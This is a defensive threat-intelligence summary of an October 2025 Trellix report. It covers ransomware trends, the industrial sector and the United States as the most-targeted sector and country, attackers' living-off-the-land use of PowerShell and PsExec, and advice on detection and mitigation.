Executive Summary

A new CyberThreat Report from Trellix for October 2025 indicates a blurring of lines between nation-state espionage and financially motivated cybercrime. Threat actors of all motivations are adopting similar, more sophisticated tactics, including the use of AI-powered malware, to increase the speed and scale of their attacks. The report, analyzing data from April to September 2025, identifies the industrial sector as the most heavily targeted, suffering 36.57% of all sector-based attacks. The research also confirms trends seen elsewhere: the United States is the most-attacked country, and the ransomware ecosystem is highly fragmented. A key technical finding is the overwhelming dominance of PowerShell as a tool in ransomware campaigns, featuring in over 77% of attacks.

Threat Overview

The convergence of TTPs (Tactics, Techniques, and Procedures) between state-sponsored groups and e-crime syndicates makes attribution more difficult and raises the overall threat level for all organizations. Nation-state actors may engage in financially motivated attacks to fund their operations, while criminal groups adopt stealthy, persistent techniques traditionally associated with espionage.

Key Trends:

• Targeting: The industrial sector is the primary target (890 incidents), indicating a focus on critical infrastructure and manufacturing where disruption has high value.
• Geography: The U.S. is the epicenter of attacks, with 1,285 victims (55% of total).
• Ransomware Fragmentation: The market is not dominated by a single group. The top five gangs, including Qilin, are responsible for less than 40% of attacks, indicating a diverse and competitive criminal ecosystem.
• AI in Attacks: The report notes the emergence of AI-powered malware, suggesting attackers are using AI for tasks like crafting more convincing phishing emails, identifying vulnerabilities, or creating polymorphic malware that evades signature-based detection.

Technical Analysis

The report provides specific data on the tools used in ransomware campaigns, highlighting the prevalence of "Living off the Land" techniques.

• Execution: T1059.001 - PowerShell was the tool of choice in 77.7% of campaigns for script execution and payload delivery.
• Lateral Movement: T1570 - Lateral Tool Transfer using PsExec was observed in 66.5% of attacks to move between systems.
• Discovery: SoftPerfect Network Scanner was used for network reconnaissance in 54.2% of cases.
• Command Execution: Standard net commands were used in 70.2% of attacks for tasks like user creation and privilege checks.

This data reinforces the need for defenders to focus on monitoring the usage of legitimate system tools, not just looking for known malware.

Impact Assessment

The focus on the industrial sector is particularly concerning due to the potential for physical consequences. A successful attack on an industrial control system (ICS) environment could lead to production shutdowns, equipment damage, environmental incidents, or even risks to human safety. The convergence of espionage and financial crime means that an attack that initially appears to be financially motivated could have a secondary objective of stealing intellectual property or establishing long-term persistence for future disruption.

Detection & Response

• Behavioral Monitoring: Given the heavy use of legitimate tools, detection must be behavior-based. Monitor for chains of activity, such as a PowerShell script leading to the use of PsExec, followed by network scanning. This is where D3FEND User Behavior Analysis becomes critical.
• PowerShell Logging: Enable and ingest PowerShell Script Block Logging (Event ID 4104) and Module Logging (Event ID 4103). This provides deep visibility into PowerShell activity, even for obfuscated or fileless attacks.
• Threat Hunting: Proactively hunt for the use of tools like PsExec and SoftPerfect Network Scanner in your environment. Establish baselines for legitimate administrative use and investigate any deviations.

Mitigation

1. Harden PowerShell: Use application control (e.g., AppLocker) to restrict PowerShell usage. Enforce a Constrained Language Mode for regular users, which limits access to dangerous commands, while allowing full access for administrators.
2. Secure Privileged Accounts: Strictly control access to administrative accounts. Implement Privileged Access Management (PAM) solutions to vault credentials and monitor privileged sessions.
3. Network Segmentation: For the industrial sector, robust segmentation between the IT and OT (Operational Technology) networks is non-negotiable. Use a DMZ to broker all communication and prevent direct access from the less-secure IT environment to the critical OT environment.
4. Layered Security: Implement a defense-in-depth strategy that includes endpoint protection (EPP), endpoint detection and response (EDR), network security, and robust backup and recovery systems.